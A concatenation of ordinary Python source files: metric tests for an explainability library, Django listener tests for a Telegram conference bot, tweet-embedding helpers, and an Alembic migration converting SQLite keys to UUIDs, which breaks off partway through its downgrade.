lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model_tf"),
lazy_fixture("load_mnist_images_tf"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model_tf"),
lazy_fixture("almost_uniform_1d_no_abatch_channel_last"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"exception": ValueError},
),
(
lazy_fixture("load_mnist_model_tf"),
lazy_fixture("load_mnist_images_tf"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
],
)
def test_model_parameter_randomisation(
model: ModelInterface,
data: np.ndarray,
params: dict,
expected: Union[float, dict, bool],
):
x_batch, y_batch = (
data["x_batch"],
data["y_batch"],
)
explain = params["explain_func"]
if params.get("a_batch_generate", True):
a_batch = explain(
model=model,
inputs=x_batch,
targets=y_batch,
**params,
)
else:
a_batch = None
if "exception" in expected:
with pytest.raises(expected["exception"]):
scores_layers = ModelParameterRandomisation(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
return
scores_layers = ModelParameterRandomisation(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
if isinstance(expected, float):
assert all(
s == expected for layer, scores in scores_layers.items() for s in scores
), "Test failed."
else:
assert all(
((s > expected["min"]) & (s < expected["max"]))
for layer, scores in scores_layers.items()
for s in scores
), "Test failed."
@pytest.mark.randomisation
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": False,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": False,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": 0.0, "max": 1.0},
),
],
)
def test_random_logit(
model: ModelInterface,
data: np.ndarray,
params: dict,
expected: Union[float, dict, bool],
):
x_batch, y_batch = (
data["x_batch"],
data["y_batch"],
)
explain = params["explain_func"]
if params.get("a_batch_generate", True):
a_batch = explain(
model=model,
inputs=x_batch,
targets=y_batch,
**params,
)
else:
a_batch = None
scores = RandomLogit(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
if isinstance(expected, float):
assert all(s == expected for s in scores), "Test failed."
else:
assert all(s > expected["min"] for s in scores), "Test failed."
assert all(s < expected["max"] for s in scores), "Test failed."
# app/conference/tests/test_listeners.py (confbot-telegram-conferences/confbot, MIT)
import pytest
from app.conference.models.channel import Channel
from app.conference.listener import start_conference_alert_owner, evaluated_conference_alert_owner
from app.conference.factories import ChannelFactory, ConferenceFactory, UserConferenceFactory
from app.users.tests.factories import UserFactory
@pytest.mark.django_db
def test_start_conference_alert_owner_alert_false(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
start_conference_alert_owner(conference, user)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_start_conference_alert_owner_is_the_owner(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
start_conference_alert_owner(conference, user)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_start_conference_alert_owner(user, mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(alert_to_owner=True, owner=user)
start_conference_alert_owner(conference, UserFactory())
assert send_message_mock.called
assert get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner_alert_false(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, user, user_conference)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner_is_the_owner(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, user, user_conference)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner(user, mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(alert_to_owner=True, owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, UserFactory(), user_conference)
assert send_message_mock.called
assert get_bot_mock.called
@pytest.mark.django_db
def test_channel_active_no_change(mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
channel: Channel = ChannelFactory(published=False)
channel.name = "channel name"
channel.save()
assert not send_message_mock.called
@pytest.mark.django_db
def test_channel_active_change(mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
channel = ChannelFactory()
channel.published = True
channel.save()
assert send_message_mock.called
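Every test above follows the same pattern: patch the side-effecting collaborators, trigger the listener, then assert on the mocks' `called` flag. A minimal stand-alone sketch of that pattern, using the stdlib `unittest.mock` directly instead of the pytest-mock `mocker` fixture (the `alert_owner` function here is hypothetical, not part of the app):

```python
from unittest.mock import MagicMock

def alert_owner(send_message, conference_owner, acting_user):
    # Only notify when someone other than the owner triggers the event,
    # mirroring the "is_the_owner" short-circuit exercised above.
    if acting_user != conference_owner:
        send_message(f"{acting_user} joined your conference")

send_message_mock = MagicMock()
alert_owner(send_message_mock, "owner", "owner")
print(send_message_mock.called)  # owner acting on their own conference: no alert sent
alert_owner(send_message_mock, "owner", "guest")
print(send_message_mock.called)  # a different user does trigger the alert
```

`MagicMock` records every call, so `called` flips to `True` the first time the fake `send_message` is invoked, which is exactly what `mocker.patch` returns in the tests above.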
# watchlib/__init__.py (marcjulianschwarz/apple-health-analyser, MIT)
from watchlib.animation import *
from watchlib.data_handler import *
from watchlib.plot import *
from watchlib.utils import *
from watchlib.analysis import *
# spdivik/inspect/callback/__init__.py (spectre-team/spectre-divik, Apache-2.0)
import spdivik.inspect.callback.visualization
import spdivik.inspect.callback.exclusion
import spdivik.inspect.callback.persistence
import spdivik.inspect.callback.recolor
import spdivik.inspect.callback.tabbing
# prepare_embeddings.py (AustinYunker/Twitter-Prediction, MIT)
import numpy as np
def document_vectorizer(corpus, model, num_features):
"""
This function averages all the word embeddings in the tweet.
corpus: String text corpus
model: Model to use (must expose a wv keyed-vector lookup)
num_features: Int, the number of features to use
returns: numpy array
"""
vocabulary = set(model.wv.index_to_key)
def average_word_vectors(words, model, vocabulary, num_features):
feature_vector = np.zeros((num_features,), dtype="float64")
nwords = 0.
for word in words:
if word in vocabulary:
nwords += 1
feature_vector = np.add(feature_vector, model.wv[word])
if nwords:
feature_vector = np.divide(feature_vector, nwords)
return feature_vector
features = [average_word_vectors(tokenized_sentence, model, vocabulary, num_features)
for tokenized_sentence in corpus]
return np.array(features)
def document_vectorizer_glove(corpus, model, num_features):
"""
This function averages all the word embeddings based on the glove model.
corpus: String text corpus
model: Model to use
num_features: Int, the number of features to use
returns: numpy array
"""
vocabulary = set(model.index_to_key)
def average_word_vectors(words, model, vocabulary, num_features):
feature_vector = np.zeros((num_features,), dtype="float64")
nwords = 0.
for word in words:
if word in vocabulary:
nwords += 1
feature_vector = np.add(feature_vector, model[word])
if nwords:
feature_vector = np.divide(feature_vector, nwords)
return feature_vector
features = [average_word_vectors(tokenized_sentence, model, vocabulary, num_features)
for tokenized_sentence in corpus]
return np.array(features) | 30.953125 | 89 | 0.635033 | 237 | 1,981 | 5.135021 | 0.232068 | 0.128184 | 0.073952 | 0.085456 | 0.885785 | 0.846343 | 0.846343 | 0.803615 | 0.741167 | 0.741167 | 0 | 0.005731 | 0.295305 | 1,981 | 64 | 90 | 30.953125 | 0.866046 | 0.202928 | 0 | 0.774194 | 0 | 0 | 0.009296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.032258 | 0 | 0.290323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# migrations/sqlite_versions/2020-05-18_6c1e62ee267f_switch_to_uuids_for_pks_for_sqlite.py
# (debrief/pepys-import, Apache-2.0)
"""Switch to UUIDs for PKs for SQLite
Revision ID: 6c1e62ee267f
Revises: ccc37f794db6
Create Date: 2020-05-18 16:54:47.274410
"""
import sqlalchemy as sa
from alembic import op
import pepys_import
# revision identifiers, used by Alembic.
revision = "6c1e62ee267f"
down_revision = "ccc37f794db6"
branch_labels = None
depends_on = None
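This migration wraps every column change in `op.batch_alter_table` because SQLite has no `ALTER TABLE ... ALTER COLUMN`; Alembic's batch mode emulates it with a "move and copy". A rough stdlib-only sketch of what that emulation does for one hypothetical table (the table and column types here are illustrative, not the real pepys-import schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (user_id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO Users (name) VALUES ('alice')")

# Move-and-copy: create a table with the new column type, copy the rows,
# drop the old table, and rename the new one into place.
conn.execute("CREATE TABLE _Users_new (user_id CHAR(32) PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO _Users_new SELECT user_id, name FROM Users")
conn.execute("DROP TABLE Users")
conn.execute("ALTER TABLE _Users_new RENAME TO Users")

rows = conn.execute("SELECT user_id, name FROM Users").fetchall()
print(rows)
```

Batch mode also recreates indexes and foreign keys on the new table, which is why each `with op.batch_alter_table(...)` block below groups all of a table's column changes into a single rebuild.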
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Activations", schema=None) as batch_op:
batch_op.alter_column(
"activation_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Changes", schema=None) as batch_op:
batch_op.alter_column(
"change_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ClassificationTypes", schema=None) as batch_op:
batch_op.alter_column(
"class_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("CommentTypes", schema=None) as batch_op:
batch_op.alter_column(
"comment_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Comments", schema=None) as batch_op:
batch_op.alter_column(
"comment_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"comment_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("CommodityTypes", schema=None) as batch_op:
batch_op.alter_column(
"commodity_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ConfidenceLevels", schema=None) as batch_op:
batch_op.alter_column(
"confidence_level_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ContactTypes", schema=None) as batch_op:
batch_op.alter_column(
"contact_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Contacts", schema=None) as batch_op:
batch_op.alter_column(
"contact_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("DatafileTypes", schema=None) as batch_op:
batch_op.alter_column(
"datafile_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Datafiles", schema=None) as batch_op:
batch_op.alter_column(
"datafile_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"datafile_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Extractions", schema=None) as batch_op:
batch_op.alter_column(
"extraction_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Geometries", schema=None) as batch_op:
batch_op.alter_column(
"geo_sub_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"geo_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"geometry_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("GeometrySubTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_sub_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("GeometryTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("HostedBy", schema=None) as batch_op:
batch_op.alter_column(
"host_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"hosted_by_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Logs", schema=None) as batch_op:
batch_op.alter_column(
"change_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"log_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("LogsHoldings", schema=None) as batch_op:
batch_op.alter_column(
"commodity_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"logs_holding_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"unit_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Media", schema=None) as batch_op:
batch_op.alter_column(
"media_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"media_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("MediaTypes", schema=None) as batch_op:
batch_op.alter_column(
"media_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Nationalities", schema=None) as batch_op:
batch_op.alter_column(
"nationality_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Participants", schema=None) as batch_op:
batch_op.alter_column(
"participant_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("PlatformTypes", schema=None) as batch_op:
batch_op.alter_column(
"platform_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Platforms", schema=None) as batch_op:
batch_op.alter_column(
"nationality_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Privacies", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("SensorTypes", schema=None) as batch_op:
batch_op.alter_column(
"sensor_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Sensors", schema=None) as batch_op:
batch_op.alter_column(
"host",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"sensor_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("States", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"state_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Synonyms", schema=None) as batch_op:
batch_op.alter_column(
"entity",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"synonym_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("TaggedItems", schema=None) as batch_op:
batch_op.alter_column(
"item_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tag_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tagged_by_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tagged_item_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Tags", schema=None) as batch_op:
batch_op.alter_column(
"tag_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Tasks", schema=None) as batch_op:
batch_op.alter_column(
"parent_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("UnitTypes", schema=None) as batch_op:
batch_op.alter_column(
"unit_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Users", schema=None) as batch_op:
batch_op.alter_column(
"user_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
# ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # The generated downgrade repeated one identical alter_column() block per
    # column, differing only in table name, column name and existing_nullable.
    # The blocks are expressed here as data; ``None`` means the generated code
    # did not pass existing_nullable for that (primary-key) column.
    uuid_to_int = [
        ("Users", [("user_id", None)]),
        ("UnitTypes", [("unit_type_id", None)]),
        ("Tasks", [("task_id", None), ("privacy_id", False), ("parent_id", False)]),
        ("Tags", [("tag_id", None)]),
        ("TaggedItems", [("tagged_item_id", None), ("tagged_by_id", False),
                         ("tag_id", False), ("item_id", False)]),
        ("Synonyms", [("synonym_id", None), ("entity", False)]),
        ("States", [("state_id", None), ("source_id", False),
                    ("sensor_id", False), ("privacy_id", True)]),
        ("Sensors", [("sensor_type_id", False), ("sensor_id", None),
                     ("privacy_id", False), ("host", False)]),
        ("SensorTypes", [("sensor_type_id", None)]),
        ("Privacies", [("privacy_id", None)]),
        ("Platforms", [("privacy_id", False), ("platform_type_id", False),
                       ("platform_id", None), ("nationality_id", False)]),
